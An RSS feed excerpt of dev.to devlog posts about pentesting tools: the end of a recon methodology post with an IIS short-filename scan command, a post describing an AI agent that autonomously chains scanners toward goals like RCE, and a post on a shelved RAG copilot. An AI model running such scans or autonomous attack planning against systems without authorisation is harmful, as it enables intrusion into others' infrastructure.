  &lt;strong&gt;4.4: Server-Specific Checks: IIS Short Filename&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;If we identify a Microsoft IIS server, we run a specialized check. The "short filename" vulnerability can allow an attacker to guess the names of hidden files and folders.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;shortscan &lt;span class="o"&gt;[&lt;/span&gt;https://iis.gravexlabs.com]&lt;span class="o"&gt;(&lt;/span&gt;https://iis.gravexlabs.com&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nt"&gt;-F&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;shortscan&lt;/code&gt; is the perfect tool for this, automating the entire guessing process.&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;The Culmination: From a Name to a Blueprint&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Look at what we've accomplished. We started with a name, "GravexLabs," and now we have a blueprint for a full-scale offensive operation. We have a list of live assets, their technologies, mapped endpoints, and a prioritized list of potential vulnerabilities including information leaks, subdomain takeovers, CORS issues, XSS, LFI, and more.&lt;/p&gt;

&lt;p&gt;This is the power of a structured, tool-assisted methodology. It's repeatable, scalable, and incredibly effective. This entire workflow, and many others, are what I've aimed to codify and simplify with my AAweRT framework. For those looking to explore even more complex, hierarchical methodologies for every stage of a penetration test, platforms like RAWPA are designed to provide that interactive guidance.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq9meed65c7abo5cok55e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq9meed65c7abo5cok55e.png" alt="AAweRT" width="800" height="378"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The hunt is complete. The real attack can now begin: business logic flaws, authorization and privilege escalation flaws, workflow and state manipulation bypasses, feature and functionality abuse, and more.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>My Pentesting AI Learned a New Word: Orchestrate.</title>
      <dc:creator>Glenn Rodney</dc:creator>
      <pubDate>Tue, 01 Jul 2025 22:14:24 +0000</pubDate>
      <link>https://dev.to/rodneys_int/my-pentesting-ai-learned-a-new-word-orchestrate-4bp3</link>
      <guid>https://dev.to/rodneys_int/my-pentesting-ai-learned-a-new-word-orchestrate-4bp3</guid>
      <description>&lt;p&gt;Hey everyone, Kuwguap here.&lt;/p&gt;

&lt;p&gt;It’s been a minute (literally just a day or two, lol) since we last talked about the journey with RAWPA. The feedback has been amazing, and watching the community engage with the tool has been the most rewarding part of this whole process. We've gained 30 users, and about 30% of them are active daily. But a question has been nagging at me, keeping me up at night: &lt;em&gt;How can I push this further? How can RAWPA help the cybersecurity community even more?&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I kept coming back to one word: &lt;strong&gt;Orchestrate&lt;/strong&gt;.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;orchestrate&lt;/strong&gt; - &lt;em&gt;plan or coordinate the elements of (a situation) to produce a desired effect, especially surreptitiously.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That’s it. That’s the next step. It’s not enough for an AI to just suggest pathways; it needs to &lt;em&gt;coordinate the elements&lt;/em&gt;. It needs to be an orchestrator. And from that idea, the next major feature for RAWPA was born: the &lt;strong&gt;Pentest Orchestrator&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Not My First Rodeo with Automation
&lt;/h3&gt;

&lt;p&gt;Some of you might know about another tool I built called &lt;strong&gt;AAweRT&lt;/strong&gt; (An Awesome Reconnaissance Tool). It’s a Bash-based framework I created to automate a ton of the initial information-gathering stages.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6c8jfm8rpuvfokj1mkhx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6c8jfm8rpuvfokj1mkhx.png" alt="AAweRT" width="800" height="812"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;(For anyone interested, AAweRT is open-source on &lt;a href="https://github.com/Kuwguap/aawert/" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;, and I'll be doing a deep-dive on it soon over at my personal blog, &lt;a href="https://kuwguap.github.io/" rel="noopener noreferrer"&gt;Rodney's Intuition&lt;/a&gt;).&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;AAweRT is great for automated recon, but what I’m building now is on a different level. The Pentest Orchestrator isn't just a sequence of scripts; it's a thinking, adaptive agent.&lt;/p&gt;
&lt;h3&gt;
  
  
  What Makes the RAWPA Orchestrator Different?
&lt;/h3&gt;

&lt;p&gt;This isn't just AAweRT with a new coat of paint. The Orchestrator is a goal-oriented AI agent that builds upon RAWPA’s neural pathway foundation.&lt;/p&gt;

&lt;p&gt;Here’s the breakdown:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Massive Toolchain:&lt;/strong&gt; It leverages &lt;strong&gt;19 integrated pentesting tools&lt;/strong&gt; (and counting!) to conduct a deep and detailed analysis of a target. This isn't just subdomain enumeration; we're talking full-spectrum vulnerability scanning and analysis.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AI-Driven Strategy:&lt;/strong&gt; This is the game-changer. After running its toolchain, the Orchestrator feeds the findings into its neural network. It cross-references the output with known CVEs, public writeups, and learned attack patterns to build the most effective initial approach to compromise the target. It doesn’t just give you data; it gives you a strategy.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foy78se3pqcr8am580j0t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foy78se3pqcr8am580j0t.png" alt="Tools in Orchestrator" width="440" height="681"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  The Current State: It Works… On My Machine
&lt;/h3&gt;

&lt;p&gt;Now, for the classic developer reality check. The Pentest Orchestrator is fully functional and works flawlessly on my local development server. The AI generates its plan, executes the toolchain, analyzes the results, and presents a strategic pathway.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Output:

Starting multi-page scrape of: https://example.com

Scraping: https://example.com

Found 0 internal links

&lt;span class="o"&gt;================================================================================&lt;/span&gt;

MULTI-PAGE ANALYSIS RESULTS FOR: https://example.com

Pages scraped: 1

&lt;span class="o"&gt;================================================================================&lt;/span&gt;

Based on the analysis of the provided HTML content from the single scraped page &lt;span class="o"&gt;(&lt;/span&gt;https://example.com&lt;span class="o"&gt;)&lt;/span&gt;, here is a comprehensive report:
&lt;span class="nt"&gt;---&lt;/span&gt;
Comprehensive Web Scraping &amp;amp; Security Analysis
&lt;span class="o"&gt;==&lt;/span&gt;
1. COMPANY/SITE DESCRIPTION

&lt;span class="nt"&gt;--&lt;/span&gt;
This website does not represent a commercial company or provide any direct service or product. The content explicitly states its purpose:

*   Primary Purpose: The site is an &lt;span class="s2"&gt;"Example Domain"&lt;/span&gt; intended &lt;span class="s2"&gt;"for use in illustrative examples in documents."&lt;/span&gt;

*   Usage Guidance: It explicitly permits &lt;span class="nb"&gt;users &lt;/span&gt;to &lt;span class="s2"&gt;"use this domain in literature without prior coordination or asking for permission."&lt;/span&gt;

*   Information Source: It provides a &lt;span class="nb"&gt;link &lt;/span&gt;to https://www.iana.org/domains/example &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="s2"&gt;"More information..."&lt;/span&gt; which points to the Internet Assigned Numbers Authority &lt;span class="o"&gt;(&lt;/span&gt;IANA&lt;span class="o"&gt;)&lt;/span&gt;, confirming its role as a reserved domain &lt;span class="k"&gt;for &lt;/span&gt;examples.

Conclusion: This domain serves purely as a placeholder or an informational page &lt;span class="k"&gt;for &lt;/span&gt;educational and documentation purposes, as defined by IANA. It is not an active business or service provider.

2. TECHNOLOGY STACK

&lt;span class="nt"&gt;--&lt;/span&gt;
The technology stack &lt;span class="k"&gt;for &lt;/span&gt;this page is extremely minimal and client-side focused:

*   Core Technologies:

    &lt;span class="k"&gt;*&lt;/span&gt;   HTML5: Indicated by &amp;lt;&lt;span class="o"&gt;!&lt;/span&gt;doctype html&amp;gt;.

    &lt;span class="k"&gt;*&lt;/span&gt;   CSS3: Used &lt;span class="k"&gt;for &lt;/span&gt;styling, all implemented via an inline &amp;lt;style&amp;gt; block within the &amp;lt;&lt;span class="nb"&gt;head&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; section.

*   Frameworks/Libraries: No discernible front-end frameworks &lt;span class="o"&gt;(&lt;/span&gt;e.g., React, Angular, Vue, jQuery&lt;span class="o"&gt;)&lt;/span&gt; or CSS frameworks &lt;span class="o"&gt;(&lt;/span&gt;e.g., Bootstrap, Tailwind CSS&lt;span class="o"&gt;)&lt;/span&gt; are detected.

*   Backend Technologies: No server-side technology can be inferred from the provided client-side HTML. It appears to be a static page.

*   Specific Libraries/Tools: None detected.

*   Possible Security or Business Flaws Visible &lt;span class="k"&gt;in &lt;/span&gt;the Code:

    &lt;span class="k"&gt;*&lt;/span&gt;   Inline CSS: While not a security flaw, embedding all CSS inline &lt;span class="k"&gt;in &lt;/span&gt;the HTML &lt;span class="o"&gt;(&lt;/span&gt;as seen with the &amp;lt;style&amp;gt; tag&lt;span class="o"&gt;)&lt;/span&gt; is generally poor practice &lt;span class="k"&gt;for &lt;/span&gt;larger, multi-page websites as it prevents browser caching of stylesheets and increases HTML file size. For a single, static example page, its impact is negligible.

    *   Given the page's static and illustrative nature, there are no obvious functional or business logic flaws visible from the client-side code.


3. SECURITY ANALYSIS &amp;amp; SENSITIVE DATA

--
The security posture of this specific page is very strong due to its minimalist and static nature.

•   Security-Relevant Details:

    *   No Forms or Authentication Mechanisms: The page contains no input fields, login forms, registration forms, or any other interactive elements that would typically handle user data or authentication.

    *   No API Endpoints: No fetch calls, XMLHttpRequest, or other JavaScript code that would interact with backend APIs are present.

    *   Meta Tags: Standard charset="utf-8", Content-type="text/html; charset=utf-8", and viewport meta tags are used.

    *   External Links: Only one external link is present, pointing to the official IANA website (https://www.iana.org/domains/example).

•   Potential Vulnerabilities or Misconfigurations:

    *   Client-Side Vulnerabilities: Due to the absence of JavaScript, user input fields, and dynamic content, common client-side vulnerabilities like Cross-Site Scripting (XSS) are highly unlikely to originate from this page's content itself.

    *   Server-Side Vulnerabilities: Cannot be assessed from the provided HTML. However, as it appears to be a static page, the attack surface for server-side vulnerabilities (e.g., SQL Injection, RCE) originating from web application logic is minimal.

    *   Misconfigurations: No obvious misconfigurations are visible in the HTML.

•   CRITICAL: Analysis of Hardcoded API Keys, Tokens, or Credentials:

    *   NONE FOUND. There are absolutely no hardcoded API keys, authentication tokens, usernames, passwords, email addresses, or any other credentials or sensitive strings present within the provided HTML content.

•   Assessment of Security Implications of Exposed Sensitive Data:

    *   None. Since no sensitive data, credentials, or personally identifiable information (PII) was found exposed within the HTML, there are no security implications stemming from sensitive data exposure on this page.


4. SITE STRUCTURE

--
•   Types of Pages Found: Only one page (main_page) was provided, which is a static informational page.

•   Content of Pages: The page contains a main heading, two paragraphs explaining its purpose as an example domain, and a single external link to the IANA website for more information.

•   How the Site is Organized: Based on the single page, the site organization is extremely simplistic, effectively a single, standalone static HTML file. There are no navigation menus, sitemaps, or complex inter-page relationships evident.


5. SENSITIVE DATA ASSESSMENT

--
•   Severity of any Exposed Credentials: N/A (Not Applicable). No credentials or sensitive API keys were found exposed within the HTML content.

•   Identify Potential Attack Vectors from Exposed Data: N/A. As no sensitive data was exposed, there are no attack vectors specifically related to exposed data from this page's content.

•   Recommend Security Improvements:

    *   For this specific page and its stated purpose, no critical security improvements related to sensitive data exposure are necessary, as it presents no such data.

    *   General Best Practices (if this were a larger, dynamic website):

        *   Separate CSS: For scalability and maintainability, move inline CSS into external .css files.

        *   Content Security Policy (CSP): Implement a robust CSP header to mitigate potential injection attacks (though less relevant for a static page without scripts).

        *   HTTPS Enforcement: While the URL shows https, ensuring strict HTTPS enforcement (e.g., HTTP Strict Transport Security - HSTS) would be crucial for any production site to prevent downgrade attacks.

        *   Server-Side Security: For any actual web application, comprehensive server-side security measures (input validation, secure session management, secure database practices, regular patching) would be paramount.
---
================================================================================
END OF ANALYSIS
================================================================================
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5w5o1a15u2lb15yueeq2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5w5o1a15u2lb15yueeq2.png" alt="Scraping and Analysis tool" width="437" height="516"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The big hurdle right now is infrastructure. RAWPA is currently hosted on Vercel, which is fantastic for serverless applications, but the Orchestrator needs a persistent Node.js/Express server to manage long-running tool executions and stateful sessions. That means migrating the backend to a provider like DigitalOcean or something similar.&lt;/p&gt;
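&lt;p&gt;To make the constraint concrete: a serverless function is torn down after each short invocation, while an orchestrated scan can run for minutes and must keep session state between steps. A persistent process can hold that state in memory. Here is a minimal Python sketch of the pattern; it is illustrative only, not the actual Orchestrator backend (which is Node.js/Express):&lt;/p&gt;

```python
# Minimal sketch of why a persistent process is needed: long-running jobs with
# in-memory session state, which a short-lived serverless function cannot keep.
import threading
import time
import uuid

SESSIONS = {}  # survives between requests only because the process stays alive

def start_scan(target):
    """Kick off a background job and return a handle the client can poll."""
    job_id = str(uuid.uuid4())
    SESSIONS[job_id] = {"target": target, "status": "running", "findings": []}

    def worker():
        time.sleep(0.1)  # stands in for minutes of subfinder/httpx/nuclei work
        SESSIONS[job_id]["findings"].append("example finding")
        SESSIONS[job_id]["status"] = "done"

    threading.Thread(target=worker, daemon=True).start()
    return job_id

def poll(job_id):
    """A status endpoint would return this on each client poll."""
    return SESSIONS[job_id]["status"]
```

&lt;p&gt;On a serverless platform, the &lt;code&gt;SESSIONS&lt;/code&gt; dict would vanish between invocations and the worker thread would be killed at the timeout, which is exactly why the Orchestrator needs a long-lived host.&lt;/p&gt;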

&lt;p&gt;So, while the feature is &lt;em&gt;built&lt;/em&gt;, it’s not yet &lt;em&gt;live&lt;/em&gt;. Once I conquer the infrastructure challenge, the Pentest Orchestrator will be fully available to all RAWPA users.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flk0kzui0fuiorvkoph0c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flk0kzui0fuiorvkoph0c.png" alt="ASN tool" width="800" height="282"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx0ky0ktiu8gkgy4aewpc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx0ky0ktiu8gkgy4aewpc.png" alt="Google Dorking" width="800" height="276"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  How It Works: A Glimpse Under the Hood
&lt;/h3&gt;

&lt;p&gt;For those who love the technical details, here’s the workflow:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Input:&lt;/strong&gt; You give the Orchestrator a target (like &lt;code&gt;example.com&lt;/code&gt;) and a goal (like "Find vulnerabilities leading to RCE").&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Planning:&lt;/strong&gt; The AI generates a dynamic, multi-phase plan, starting with reconnaissance and moving through vulnerability assessment.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Execution:&lt;/strong&gt; It autonomously runs tools like &lt;code&gt;subfinder&lt;/code&gt;, &lt;code&gt;httpx&lt;/code&gt;, and &lt;code&gt;nuclei&lt;/code&gt; in sequence. The output of one tool becomes the input for the next.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Analysis &amp;amp; Adaptation:&lt;/strong&gt; Here’s the magic. After each step, the AI analyzes the results. If it finds a login panel, it might dynamically decide to prioritize deeper testing there. If it finds a critical CVE, it adjusts its strategy to focus on that vector.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Reporting:&lt;/strong&gt; Finally, it compiles the findings, vulnerabilities, and evidence into a comprehensive report.&lt;/li&gt;
&lt;/ol&gt;
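&lt;p&gt;The five steps above can be sketched in a few lines of Python. Everything here is illustrative: the tool wrappers return canned data, and the "append ffuf on finding a login panel" rule is a toy stand-in for the AI's analysis step, not RAWPA's real integrations:&lt;/p&gt;

```python
# Illustrative sketch of the Orchestrator loop; the tool wrappers and
# canned outputs are hypothetical stand-ins for real tool executions.
def run_tool(name, targets):
    """Hypothetical wrapper: a real version would shell out to the tool."""
    canned = {
        "subfinder": ["app.example.com", "login.example.com"],
        "httpx": ["https://login.example.com"],
        "nuclei": ["exposed-panel on login.example.com"],
    }
    return canned.get(name, [])

def orchestrate(target, goal):
    plan = ["subfinder", "httpx", "nuclei"]        # 2. Planning
    findings, current_input = [], [target]
    for step in plan:                              # 3. Execution: each output
        output = run_tool(step, current_input)     #    feeds the next tool
        if "ffuf" not in plan and any("login" in line for line in output):
            plan.append("ffuf")                    # 4. Adaptation: dig deeper here
        findings.extend(output)
        current_input = output
    return {"target": target, "goal": goal, "findings": findings}  # 5. Reporting
```

&lt;p&gt;Calling &lt;code&gt;orchestrate("example.com", "Find RCE")&lt;/code&gt; walks the plan, appends an extra step when a login panel shows up, and returns the compiled report; the real system replaces the canned data and the toy rule with live tool runs and AI analysis.&lt;/p&gt;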

&lt;p&gt;This new feature represents the next evolution of RAWPA—moving from a knowledgeable assistant to an active, intelligent partner in your security assessments.&lt;/p&gt;

&lt;p&gt;As always, RAWPA is built for and by the community. If you have ideas, methodologies, or want to contribute, hit up the "Contribute" feature on the &lt;a href="https://www.rawpa.vercel.app" rel="noopener noreferrer"&gt;RAWPA site&lt;/a&gt; or connect with me on &lt;a href="https://www.linkedin.com/in/glenn-osioh-85104827b/" rel="noopener noreferrer"&gt;LinkedIn&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The journey continues, and I can't wait to get the Orchestrator into your hands. Stay tuned.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>I'm Building a "Copilot for Hackers", But I'm Forcing it to Be Dumb</title>
      <dc:creator>Glenn Rodney</dc:creator>
      <pubDate>Thu, 19 Jun 2025 15:27:08 +0000</pubDate>
      <link>https://dev.to/rodneys_int/im-building-a-copilot-for-hackers-but-im-forcing-it-to-be-dumb-15n3</link>
      <guid>https://dev.to/rodneys_int/im-building-a-copilot-for-hackers-but-im-forcing-it-to-be-dumb-15n3</guid>
      <description>&lt;p&gt;Hey everyone! 👋&lt;/p&gt;

&lt;p&gt;If you're a developer or a security researcher, you know the feeling. You're hours into a problem, you've run through all your checklists, and you hit a wall. You lean back and have that all-too-familiar thought: &lt;em&gt;"So, what now?"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;For the past few months, I've been building a project called &lt;strong&gt;RAWPA (Rodney the Advanced Web Pentesting Assistant)&lt;/strong&gt; to be the answer to that exact question. But before I show you what it is, I need to tell you what it &lt;em&gt;isn't&lt;/em&gt;.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;I need to state this with utmost importance: &lt;strong&gt;RAWPA is not a "get bugs quick scheme."&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I strongly encourage the manual process of scouring through JS files, searching for business logic errors, finding exposed endpoints, and getting creative in Burp Suite. RAWPA is not an automation script to replace those skills. It's a companion to provide more ideas when your own list runs out.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  The Shiny AI Feature (And Why I Benched It)
&lt;/h3&gt;

&lt;p&gt;Naturally, I wanted to build a slick, AI-powered assistant. I dove in headfirst, building a RAG (Retrieval-Augmented Generation) model to act as a "Copilot" for each testing step. The initial results were amazing! The AI was parsing commands and providing genuinely helpful guidance. It felt like magic. ✨&lt;/p&gt;
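&lt;p&gt;For readers unfamiliar with RAG: the core idea is to retrieve the methodology snippets most relevant to the tester's current step and hand them to the model as context alongside the question. A toy sketch, with naive word-overlap scoring standing in for the real embedding-based retrieval:&lt;/p&gt;

```python
# Toy retrieval-augmented flow; the corpus and scoring are illustrative
# stand-ins, not RAWPA's actual pipeline.
CORPUS = [
    "Check JS files for exposed API endpoints and secrets.",
    "Test IDORs by swapping object IDs between two accounts.",
    "Fuzz hidden parameters with a wordlist before moving on.",
]

def retrieve(query, corpus, k=2):
    """Rank snippets by word overlap with the query (real systems use embeddings)."""
    q_words = set(query.lower().split())
    scored = sorted(
        corpus,
        key=lambda s: len(q_words.intersection(s.lower().split())),
        reverse=True,
    )
    return scored[:k]

def build_prompt(query, corpus):
    """Prepend the retrieved snippets so the model answers with grounded context."""
    context = "\n".join(retrieve(query, corpus))
    return f"Context:\n{context}\n\nQuestion: {query}"
```

&lt;p&gt;The hard part, as the rest of this post explains, is not this happy path but keeping retrieval precise as the corpus grows.&lt;/p&gt;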

&lt;p&gt;But as I tried to make it more precise, the magic started to fade. The responses got noisy, the code started breaking, and I realized I was spending all my time debugging the AI instead of building the core of the app.&lt;/p&gt;

&lt;p&gt;So I made a tough call: I put the entire feature on hold.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw46hcy478se24v3qh6ks.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw46hcy478se24v3qh6ks.png" alt="RAWPA User Dashboard" width="800" height="431"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I built an admin panel for the project (a huge win in itself!) and added a simple toggle to turn the AI off. It felt like benching my star player, but it was the right strategic move. Perfecting that AI is a whole project on its own, and the core methodologies had to come first.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvxewqt4zc1yjweftedwu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvxewqt4zc1yjweftedwu.png" alt="RAWPA Straightup Methodologies" width="800" height="430"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  So, What Am I Doing Now? The Grind.
&lt;/h3&gt;

&lt;p&gt;Right now, I'm in the deep-dive research phase. This is the less glamorous part of development that doesn't always make it into blog posts. I'm spending my days (and nights) scouring the web, watching technical talks, and digging through research papers to find, test, and validate every single methodology that goes into RAWPA.&lt;/p&gt;

&lt;p&gt;This process was validated when I stumbled upon lostsec's site, which has a similar purpose. Instead of feeling discouraged, it gave me the will to continue, proving there's a real need for tools that augment, rather than automate, our thinking.&lt;/p&gt;

&lt;p&gt;This project also thrives on community knowledge. A connection from LinkedIn gave me a fantastic list of future feature ideas, like gamification, tool integrations, and collaborative modes, which have really shaped the long-term vision.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff2ejwrt2hdhwnps0gvoc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff2ejwrt2hdhwnps0gvoc.png" alt="RAWPA Straightup Methodologies" width="800" height="431"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  What's Next &amp;amp; How You Can Help
&lt;/h3&gt;

&lt;p&gt;My goal is to make RAWPA a reliable, community-informed resource.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You can follow the nitty-gritty details of the development journey on my personal blog here: &lt;strong&gt;&lt;a href="https://kuwguap.github.io/posts/series-2-implementing-wpa-in-rawpa-part-1/" rel="noopener noreferrer"&gt;https://kuwguap.github.io/posts/series-2-implementing-wpa-in-rawpa-part-1/&lt;/a&gt;&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;This is a community-driven effort. If you have methodologies, ideas, or suggestions, I would love to hear them. The best way to reach out is on &lt;a href="https://www.linkedin.com/in/glenn-osioh-85104827b/" rel="noopener noreferrer"&gt;&lt;strong&gt;LinkedIn&lt;/strong&gt;&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;At the end of the day, I believe RAWPA will help someone get unstuck and learn something new. And for me, that's good enough.&lt;/p&gt;

&lt;p&gt;Thanks for reading!&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>devlog</category>
      <category>python</category>
      <category>ai</category>
    </item>
  </channel>
</rss>
